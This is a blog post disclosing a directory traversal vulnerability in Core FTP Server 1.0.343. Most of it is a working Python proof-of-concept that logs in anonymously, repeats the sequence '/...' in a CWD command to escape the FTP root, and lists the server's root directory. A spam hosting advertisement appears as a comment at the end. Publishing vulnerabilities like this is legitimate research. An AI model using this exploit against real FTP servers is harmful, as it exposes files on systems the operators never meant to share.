This site is soon to be deprecated by http://www.johnleitch.net

Thursday, May 27, 2010

Core FTP Server 1.0.343 Directory Traversal

It's possible to navigate the local file system of a server running Core FTP Server 1.0.343 by using a specially crafted URL.

Exploit
/...

PoC
list_root.py
import sys, socket, re

host = 'localhost'
port = 21
user = 'anonymous'
password = 'a'

buffer_size = 8192
timeout = 8

def recv(s):
resp = ''

while 1:
r = s.recv(buffer_size)
if not r: break
resp += r

return resp

def list_root():
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(timeout)

print s.recv(buffer_size)

s.send('USER ' + user + '\r\n')
print s.recv(buffer_size)

s.send('PASS ' + password + '\r\n')
print s.recv(buffer_size) + s.recv(buffer_size)

s.send('CWD ' + '/...' * 16 + '\r\n')

resp = s.recv(buffer_size)

print resp

if resp[:3] == '250':
s.send('PASV\r\n')
resp = s.recv(buffer_size)

print resp

pasv_info = re.search(u'(\d+),(\d+),(\d+),(\d+),(\d+),(\d+)', resp)

if (pasv_info == None):
print 'Invalid PASV response: ' + resp
return

s.send('LIST\r\n')

s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((host, int(pasv_info.group(5)) * 256 + int(pasv_info.group(6))))
s2.settimeout(timeout)

print recv(s2)

s.close()

except Exception:
print sys.exc_info()

list_root()

2 comments:

  1. Best FTP hosting service should provide it users with features such as daily backup, software support, security tools like SSL and SSH, suitable uptime, private FTP account and technical support.

    ReplyDelete